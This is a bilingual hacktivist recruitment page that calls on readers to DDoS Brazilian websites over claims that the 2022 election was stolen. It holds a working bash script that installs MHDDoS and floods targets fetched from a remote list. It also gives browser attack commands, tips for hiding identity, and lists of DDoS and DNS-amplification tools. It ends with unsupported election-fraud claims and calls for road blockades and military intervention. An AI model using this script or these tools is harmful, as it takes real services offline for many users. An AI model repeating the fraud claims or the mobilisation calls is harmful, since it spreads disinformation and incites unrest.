IT Army of Brazil - Cyber Weapons Division === Entenda: [CIA na administração do Biden está interferindo na eleição brasileira há mais de um ano, pressionando o gabinete do presidente Jair Bolsonaro a não questionar as eleições](https://twitter.com/DiretoDaAmerica/status/1587997634077270016?s=20&t=xa4g9fSMZ4y3zsb-5joj6w) [Lula e PCC](https://www.gazetadopovo.com.br/opiniao/editoriais/censura-antagonista-pcc-marcola-lula/) https://votaramnomeulugar.com http://brazilwasstolen.com/pt/ [Relatório Fraude](https://drive.google.com/file/d/14sOcqsArRxftPgIN-9vZS2u2KkiZqNRu/view?usp=drivesdk) [Red Flags Eleição Benfords Law](https://creativedestructionmedia.com/analysis/2022/10/30/breaking-forensic-experts-suggest-mathematical-red-flags-in-first-round-of-brazilian-presidential-election-cites-benfords-law/) O presidiario ilegitimamente eleito é ligado ao narcotráfico e [facções criminosas como o PCC](https://revistaoeste.com/politica/eleicoes-2022/marcola-declara-preferencia-por-lula-afirma-reportagem/) e estão todos acomunados com o o judiciário a mídia e o establishment! Ajude-nos a evitar que o Brasil tome o mesmo rumo dos países vizinhos e se torne uma ditadura socialista! [Assinem essa petição](https://www.change.org/p/stf-pela-an%C3%A1lise-do-pedido-de-impeachment-contra-o-ministro-alexandre-de-moraes-do-stf?recruiter=1283350440&utm_source=share_petition&utm_campaign=psf_combo_share_initial&utm_medium=whatsapp&utm_content=washarecopy_27846516_pt-BR%3A2&recruited_by_id=67538fa0-5a26-11ed-9255-376457bd1c72) [Siga o exército no Instagram](https://instagram.com/exercito_oficial?igshid=YmMyMTA2M2Y=) --- **CUIDADO, é uma guerra cibernética, mas o DDoS é considerado ilegal em quase todos os países.** **Além disso, você corre o risco de ter sua internet bloqueada pelo seu provedor ou ter seu contrato cancelado.** _Não apoio agressão a entidades pacíficas, mas estamos em guerra, estamos nos defendendo, e ajudando o agredido a se defender de seu agressor, nesse caso, não vejo nenhuma violação ética ou moral em DDoSing o agressor_ Este documento está em constante atualização. Você pode encontrar conteúdo novo e atualizado ao visitar este documento novamente. --- **BEWARE, It's a cyberwar, but DDoS is considered illegal in almost every country.** **Also, you will risk having your internet blocked by your provider or having your contract cancelled.** _I don`t support aggression over peaceful entities, but we are in war, we are defending ourselves, and helping the assaulted to defend from its agressor, in that case, I dont see any ethical or moral violation in DDoSing the agressor_ This document is in constant update. You may find new and updated content as you visit this document again. ## TLDR Basta mantê-lo aberto no seu navegador da web: www.white-valeria-64.tiiny.site Mantenha o maior tempo possível, com a ajuda de cada um de vocês, daremos um sinal forte ao judiciário criminoso. --- Simple keet it open in your web browser: https://white-valeria-64.tiiny.site/ ## Introduction Nós POVO DO BRASIL não reconhecemos o atual presidiario eleito como legítimo, ele foi eleito por uma eleição fraudulenta onde todo o establishment foi contra a oposição nosso legítimo presidente Jair Bolsonaro censurando e prendendo criminosamente a oposição. --- We POEPLE OF BRAZIL do not recognize the current elected president as legit, he was elected by a fraudulent election where all the establishment was against the oposition our legit president Jair Bolsonaro ## Uso - Usage ### Usando no Navegador - Using a Web Browser Sua missão aqui é simples, você fará [DDoS](https://en.wikipedia.org/wiki/Denial-of-service_attack) em sites/endpoints estratégicos para derrubá-los ou prejudicar significativamente seus serviços. --- Your mission here is simple, you will [DDoS](https://en.wikipedia.org/wiki/Denial-of-service_attack) on strategic websites/endpoints in order to take them down or significantly distrupt their services.  --- Até agora você tem dois métodos diferentes, primeiro é usar um dos URLs abaixo. A outra opção é usar um script DDoS no [Ubuntu Linux](https://ubuntu.com/tutorials/how-to-run-ubuntu-desktop-on-a-virtual-machine-using-virtualbox), [WSL](https://learn.microsoft.com/en-us/windows/wsl/install) ou [GCP](https://cloud.google.com/shell?hl=pt-br). --- By now you have two different methods, first is using one of the URLs below. The other option is by using a DDoS script on [Ubuntu Linux](https://ubuntu.com/tutorials/how-to-run-ubuntu-desktop-on-a-virtual-machine-using-virtualbox), [WSL](https://learn.microsoft.com/en-us/windows/wsl/install) or [GCP](https://cloud.google.com/shell?hl=pt-br). --- Basta mantê-lo aberto no seu navegador da web: https://white-valeria-64.tiiny.site/ --- Simple keet it open in your web browser: https://white-valeria-64.tiiny.site/ --- Você pode querer usar um serviço VPN para ocultar sua identidade antes de fazê-lo, eu recomendo usar [Hola VPN no navegador Opera](https://addons.opera.com/en/extensions/details/hola-better-internet/) > [Opera Browser também tem uma opção de VPN integrada](https://blogs.opera.com/news/2016/09/how-to-set-up-a-vpn-mac-windows-linux/) Estamos oferecendo uma conta NordVPN paga gratuitamente para membros ativos, se você quiser uma conta, entre em contato conosco: https://t.me/+4oni7gAM9VE1NDQx ---- You may want to use a VPN service to hide your identity before doing it, I recommend using [Hola VPN on Opera Browser](https://addons.opera.com/en/extensions/details/hola-better-internet/) > [Opera Browser also has a built-in VPN option](https://blogs.opera.com/news/2016/09/how-to-set-up-a-vpn-mac-windows-linux/) We are offering paid NordVPN account for free for active members, if you wanna a account contact us: https://t.me/+4oni7gAM9VE1NDQx --- Também recomendo [alterar seu servidor DNS](https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10) para [9.9.9.9](https://www.quad9.net/) e DNS secundário para [1.1.1.1](https://www.cloudflare.com/pt-br/learning/dns/what-is-1.1.1.1/) e usando [DNS sobre HTTPS](https://4sysops.com/archives/secure-dns-requests-over-https-doh-in-windows-1011/) e também usar [endereços MAC aleatórios](https://support.microsoft.com/en-us/windows/how-to-use-random-hardware-addresses-in-windows-ac58de34-35fc-31ff-c650-823fc48eb1bc#:~:text=a%20specific%20network%3A-,Select%20the%20Start%20button%2C%20then%20select%20Settings%20%3E%20Network%20%26%20Internet,hardware%20addresses%20for%20this%20network.) --- I also recommend [changing your DNS server](https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10) to [9.9.9.9](https://www.quad9.net/) and secondary DNS to [1.1.1.1](https://www.cloudflare.com/pt-br/learning/dns/what-is-1.1.1.1/) and using [DNS over HTTPS](https://4sysops.com/archives/secure-dns-requests-over-https-doh-in-windows-1011/), and also use [randomized MAC Addresses](https://support.microsoft.com/en-us/windows/how-to-use-random-hardware-addresses-in-windows-ac58de34-35fc-31ff-c650-823fc48eb1bc#:~:text=a%20specific%20network%3A-,Select%20the%20Start%20button%2C%20then%20select%20Settings%20%3E%20Network%20%26%20Internet,hardware%20addresses%20for%20this%20network.) --- Se você está acostumado com o Linux, idealmente você pode querer [inicializar um sistema operacional Tails Linux](https://www.techrepublic.com/article/getting-started-with-tails-the-encrypted-leave-no-trace-operating-system/#:~:text=Durante%20o%20bootup%20process%2C%20press,em%20your%20second%20USB%20drive.) esta é a opção mais segura. A desativação do CORS é necessária para obter o máximo desempenho dessas páginas. Veja como [aqui](https://stackoverflow.com/a/58658101/1644554) --- If you're ok with Linux, ideally you may want to [boot a Tails Linux OS](https://www.techrepublic.com/article/getting-started-with-tails-the-encrypted-leave-no-trace-operating-system/#:~:text=During%20the%20bootup%20process%2C%20press,on%20your%20second%20USB%20drive.), this is the safest option. Disabling CORS is necessary to be able to get the most performance out of those pages.  See how [here](https://stackoverflow.com/a/58658101/1644554) --- Ou você pode simplesmente [usar uma extensão do navegador](https://chrome.google.com/webstore/detail/cors-unblock/lfhmikememgdcahcdlaciloancbhjino) > Você pode usar um navegador headless na linha de comando com sites como o Firefox. > Com um navegador headless, você pode atacar usando https://shell.cloud.google.com > Você pode [habilitar o WSL](https://www.configserverfirewall.com/windows-10/windows-subsystem-for-linux-2/) para usar um Shell Linux em seu sistema Windows Com o WSL você pode executar todos os scripts abaixo neste artigo --- Or you can simply [use a browser extension](https://chrome.google.com/webstore/detail/cors-unblock/lfhmikememgdcahcdlaciloancbhjino) > You can use a headless browser on the command line with those websites like Firefox. > With a headless browser you can attack using https://shell.cloud.google.com > You can [enable WSL](https://www.configserverfirewall.com/windows-10/windows-subsystem-for-linux-2/) to use a Linux Shell on your Windows system With WSL you can run all the scripts below in this article --- Firefox Windows: `firefox --headless --private-window https://red-caitrin-37.tiiny.site` --- Chrome Windows: `"[CHROME PATH HERE]/chrome.exe" --disable-web-security https://red-caitrin-37.tiiny.site/` --- Chrome Mac: `open -na Google\ Chrome --args --user-data-dir=/tmp/temporary-chrome-profile-dir --disable-web-security --disable-site-isolation-trial https://red-caitrin-37.tiiny.site` --- ### Usando no Linux Ubuntu - Using on Ubuntu Linux Se você for um usuário mais avançado, poderá executar um script de shell em um sistema Ubuntu Linux para DDoS nos sites. Este é um script que fiz para executar vários ataques DDoS paralelos. --- If you're a more advanced user, you can run a shell script on a Ubuntu Linux system to DDoS the websites. This is a script that I have made to run multiple parallel DDoS attacks. ``` #!/bin/bash # sudo apt update # sudo apt upgrade -y [[ $(dpkg -l jq) ]] || sudo apt install jq -y [[ $(dpkg -l git) ]] || sudo apt install git -y [[ $(dpkg -l curl) ]] || sudo apt install curl -y [[ $(dpkg -l wget) ]] || sudo apt install wget -y [[ $(dpkg -l python) ]] || sudo apt install python -y [[ $(dpkg -l python3-pip) ]] || sudo apt install python3-pip -y [[ $(dpkg -l syslinux-utils) ]] || sudo apt install syslinux-utils -y [[ -d MHDDoS ]] || git clone https://github.com/MHProDev/MHDDoS.git || exit 1 [[ -d MHDDoS ]] && sudo pip3 install -r ./MHDDoS/requirements.txt || exit 1 declare -a targets=() for target in $(curl -s https://api.npoint.io/4cf7ffd49bb41c631f5c | jq -c | sed -e 's/,/ /g' | tr -d '[' | tr -d ']' ); do targets+=("$target") done declare -a methods=( "get" "post" "ovh" "stress" "dyn" "downloader" "slow" "head" "null" "cookie" "pps" "even" "gsb" "dgb" "avb" "bot" "apache" "xmlrpc" "cfb" "cfbuam" "bypass" "bomb" "killer" "tcp" "udp" "syn" "cps" "connection" "vse" "ts3" "fivem" "mem" "ntp" "mcbot" "minecraft" "mcpe" "dns" "char" "cldap" "ard" "rdp" ) socks_type=6 threads=500 proxy_list=proxies.txt rpc=100 duration=3600 debug=true for target in "${targets[@]}"; do for method in "${methods[@]}"; do until eval "$(cd MHDDoS && sudo python3 start.py "$method" "$(echo "$target" | tr -d '"')" "$socks_type" "$threads" "$proxy_list" "$rpc" "$duration" "$debug")"; do # until eval "$(cd MHDDoS && sudo python3 start.py "$method" "$(gethostip -d "$target")" $socks_type $threads $proxy_list $rpc $duration $debug)"; do echo "$target udp attack crashed with exit code $?. Respawning" sleep 1 done & done done ``` Por favor, use uma VPN antes de usar o script, pergunte nos grupos do Telegram, há muitas contas NordVPN que eles estão compartilhando, verifique também as opções gratuitas neste documento abaixo. Você também pode utilizar este script em seu dispositivo [Android com Termux](https://termux.dev/en/). Observe que essas ferramentas foram feitas apenas para URLs únicos, portanto, usá-las em vários URLs com esse script pode exigir muito do hardware. Para executar o script, basta copiar e colar isso no seu terminal e pronto. Deixe o maior tempo possível: --- Please use a VPN before using the script, ask on Telegram groups, there is a lot of NordVPN account they are sharing, also check free options in this document below. You can also utilize this script on your Android device with Termux. Note that those tools were made for single URLs only, so using them on multiple URLs with this script may be hardware intensive. To run the script, just copy and paste this on your terminal, and you're done. Leave it as long as possible: --- > Se você não quiser executá-lo em seu computador, você pode usar https://shell.cloud.google.com. --- > If you dont want to run it on your computer you can use https://shell.cloud.google.com. --- Veja como [aqui](https://www.youtube.com/watch?v=gfuaRFfato8) ou [aqui](https://www.aparat.com/v/XPn5Z) --- See how [here](https://www.youtube.com/watch?v=gfuaRFfato8) or [here](https://www.aparat.com/v/XPn5Z) --- Ou você pode usar os VPSs gratuitos listados no rodapé do documento Or you can use the free VPSs listed in the footer of the document. --- ### API para Devs - API For Devs Se você é um desenvolvedor, criamos APIs com os destinos atuais. Você pode me ajudar a melhorar este documento, mas precisará criar uma conta no hackmd.io e me enviar uma mensagem de texto no Telegram com o e-mail que você usou para ter acesso de edição a este documento. Utilize o [email proton](https://proton.me/pt-br) para maior segurança. --- If you're a developer, We have created APIs with the current targets. You can help me improving this document, but you will need to create an account on hackmd.io and text me on Telegram with the email you used in order to have edit access to this document. Utilize [proton mail](https://proton.me/pt-br) for more security. --- Você pode buscar os dados usando a lista de destinos e o nome do objeto de destino. Na linha de comando, você precisará de curl e jq. --- You can fetch the data using the targets list and the target object name. On the command line, you will need curl and jq. `curl -s https://api.npoint.io/4cf7ffd49bb41c631f5c | jq -r` ### Alvos atuais - Current Targets https://reqbin.com/5g4mynwf --- # Outros recursos - Another resources --- ### Free VPS https://aws.amazon.com/pt/free/ https://www.oracle.com/cloud/free/ https://gratisvps.net/ https://baehost.com/en-int/vps-argentina/vps-gratis ### Free VPNs ClearVPN * Register on https://my.clearvpn.com/ * [Download and install ClearVpn application](https://macpaw.com/clearvpn) * Login to your account. * Press the "Change your location" button and change it to Russia (prefer) or another country. IF YOU WANT FREE NORDVPN CONTACT US AT https://t.me/+4oni7gAM9VE1NDQx **Please, do not select Brazil on the VPN. Citizens in Brazil must be able to access the Internet** https://protonvpn.com/ https://www.f-secure.com/ https://www.urban-vpn.com/ https://atlasvpn.com/vpn-for-windows ### Another DDoS Tools This is one is hot: https://github.com/seedpockets/ukrainian-warship https://github.com/ajax-lives/NoRussian - HTML ajax ddos https://github.com/smok-serwis/siege-engine - take a look https://github.com/1N3/Sn1per - useful to do main recon https://github.com/thesc1entist/j0lt - dns amplification tool https://github.com/OffensivePython/Saddam - dns amplification tool https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection  https://github.com/XCHADXFAQ77X/SLOWLORIS - another way https://github.com/gkbrk/slowloris.git - another slowloris repo https://github.com/cyweb/hammer - tool that I have used https://github.com/TermuxHackz/Hammer - same tools for Termux on android. https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack https://www.yougetsignal.com/tools/web-sites-on-web-server/ https://www.ip-address.org/reverse-lookup/reverse-ip.php - find other websites hosted on the same server. https://github.com/LimerBoy/Impulse https://github.com/maxng07/dns-flood https://ufonet.03c8.net/ https://github.com/MHProDev/MHDDoS - Best DDoS Attack Script Python3, Cyber Attack With 40 Methods https://sourceforge.net/projects/loic/ - Famous LOIC UDP, TCP, and HTTP requests to the server Test the performance of the network. Loic does not hide an IP address. Perform stress testing. HIVEMIND mode will allow you to control remote LOIC systems. With the help of this, you can control other computers in a zombie network. https://sourceforge.net/projects/highorbitioncannon/ - infamous hoic Attack up to 256 websites at once. counter to measure the output. ported over to Linux or Mac OS. ### Shut Down YouTube Channels! Let's shut down more news YouTube channels that openly lie about the war in Ukraine.  YouTube channels:  YouTube-blogers: How to report channels:  ⁃ Turn on your laptop or desktop computer.  ⁃ Turn on VPN as most channels are not available in Ukraine.  ⁃ Sign in to your YouTube account.  ⁃ Open the desired channel.  ⁃ Go to the About tab.  ⁃ Find the flag image and click on it.  ⁃ Select the appropriate violation description from the drop-down menu. ### SQLi https://hackertarget.com/sqlmap-tutorial/ https://www.binarytides.com/sqlmap-hacking-tutorial/ ### Specialize If you want to become an expert and I.T Security field you may want to start reading those curated awesome guides: https://github.com/onlurking/awesome-infosec https://github.com/rmusser01/Infosec_Reference --- [3/11 08:14] Manoel Lerax: Não conheço a procedência dos documentos nem a origem dos dados, mas sim, os argumentos fazem sentido. As distribuições estatísticas nem correlações não devem mudar de formato substancialmente por mais que tenha porcentagem diferente de votos, o que muda seria apenas os parâmetros. No primeiro documento, que li com mais atenção, acho pertinente os argumentos, a única dependência de realizar uma validação disso é saber a origem dos dados e poder replicar os resultados. Se for replicável, faz sentido. Existe uma probabilidade considerável de haver comportamento artificial na distribuição, o que implica manipulação e eventual fraude. A parte dos logs, que ele compara ter duas saídas diferentes dependendo do modelo de urna, não sei como conseguiu essa informação dos logs, aliás pessoal do software se quer tratou da codificação das strings direito, tá tudo cagado os logs. Mas se for real, so tem duas possibilidades um comportamento de branching no software (um if em alguma circunstância) ou a hipótese que ele mesmo soltou, de haver dois softwares diferentes rodando entre várias urnas o que implicaris dois códigos fontes, e apenas um deles foi auditado publicamente. Mais uma evidência suspeita. Além disso branching no código se demonstra improvável dado a natureza de propósito único nas urnas. [3/11 08:16] Manoel Lerax: Quanto ao segundo documento, a lei de benford, é uma lei matemática que estuda a distribuição de dígitos em números gerados naturalmente (imposto, eleição, contagem de população de animais, entre outros). É uma distribuição natural dos números na natureza em relação a contagem. Uma vez violada essa distribuição se caracteriza sim manipulação. Inúmeras vezes o estados unidos conseguiu detectar fraude na declaração de imposto de renda e notas fiscais frias usando a lei de benford. O mesmo princípio vale pra eleições. Neste segundo documento, o autor explica e demonstra várias vezes como a distribuição das eleições da contagem de votos das urnas por seção divergem em relação a distribuição de benford. Nesse caso, seria caracterizado como comportamento artificial também. Mas mais uma vez, seria importante reconhecer a fonte dos dados e reproduzir os experimentos. Se for reproduzido, é uma evidência fortíssima. --- ATENÇÃO, ENTREM NOS GRUPOS DE SEUS RESPECTIVOS ESTADOS E ORGANIZEM SUAS CONCENTRAÇÕES. PRIMEIRO RODOVIAS, DEPOIS VIAS DE ACESSO E POR FIM, CENTRO DAS CIDADES. O PRAZO PARA AÇÃO DAS FFAA É DE 72 HORAS, NÃO TEMOS POLÍTICOS, PARTIDOS OU FINANCIAMENTOS. NÓS O POVO, NÃO SEREMOS ULTRAJADOS E NEM A NOSSA PÁTRIA! COMUNISMO AQUI NÃO. LISTA DE GRUPOS TELEGRAM ENTREM NO SEU ESTADO SOMENTE POR FAVOR! *PARANÁ https://t.me/paralisacaogeralpr *RIO GRANDE DO SUL https://t.me/paralisacaonacionalrs *SANTA CATARINA https://t.me/paralisacaogeralsc *RIO DE JANEIRO https://t.me/paralisacaogeralrj *SÃO PAULO https://t.me/paralisacaogeralsp *MATO GROSSO https://t.me/parallisacaogeralmt *MINAS GERAIS https://t.me/parallisacaogeralmg *PARÁ https://t.me/paralisacaogeralpara *BAHIA https://t.me/paralisacaogeralbahia *GOIÁS https://t.me/paralisacaogeralgoias *ACRE https://t.me/paralisacaogeralacre *ALAGOAS https://t.me/parallisacaogeralalagoas *AMAPÁ https://t.me/+DHhqozfUAc1iNTEx *CEARÁ https://t.me/+EgTNUzzkcbg0NjQx *ESPÍRITO SANTO https://t.me/+MUShtedKWWhkODIx *MARANHÃO https://t.me/+ojgZk1opr-g5MzY5 *PERNAMBUCO https://t.me/+QxIVsm7KIyZiZWIx *MATO GROSSO DO SUL https://t.me/+TinDbtPw9kwwMDE5 *PARAÍBA https://t.me/+3SNmj-KI0s4wZjQx *PIAUÍ https://t.me/+ZSVdJwgzNt80MzMx *RIO GRANDE DO NORTE https://t.me/+vzzjjYA7sicwZjlh *RONDÔNIA https://t.me/+edzIyV9r61QyN2Mx *SERGIPE https://t.me/+2MVDnH8Dh8cxODVh *AMAZONAS https://t.me/+j581sgoyA-xlOTIx *TOCANTINS https://t.me/+mVMlT6mDrZ80YzBh *DISTRITO FEDERAL https://t.me/+Bf7qiCdvrq4wNWY5 *RORAIMA https://t.me/+edzIyV9r61QyN2Mx *VALE DO PARAÍBA https://t.me/+HSyNaLJAsoY4YTcx *SÃO JOSÉ DOS CAMPOS https://t.me/+vHokpQBstHhhMDQx Atenção estão derrubando todos os grupos do WhatsApp e telegram vamos nos unir em uma só plataforma para evitar infiltrados vamos nos unir por um Brasil melhor Instale o aplicativo: *SIGNAL* é mais seguro e criptografado https://signal.group/#CjQKIF8Vs-ugaJGxAUh9T_xAe4AOe8YSjEkYbq2_WONKlI79EhDd-PaYn9aT2JCSRBP9UYlr Entre no grupo do WhatsApp https://chat.whatsapp.com/D2jukbaa7yQAbvTXE0Hq1c https://www.facebook.com/aliancapontalspoficial/videos/501958645185878/ Entre no grupo Element! https://app.element.io/#/room/#BRASILACIMADETUDO:matrix.org AO VIVO PARALISAÇÃO DOS CAMINHONEIROS NA RODOVIA ANHANGUERA EM RIBEIRÃO PRETO! 🇧🇷🇧🇷🇧🇷🇧🇷🇧🇷 ADESÃO DA POLÍCIA MILITAR Em algum desses milhares de movimentos pelo País... de arrepiar! O meliante não vai tomar posse! https://www.facebook.com/watch/?v=511237270881044&extid=NS-UNK-UNK-UNK-IOS_GK0T-GK1C&ref=sharing GRUPO DE CYBER ATIVISMO! https://t.me/+4oni7gAM9VE1NDQx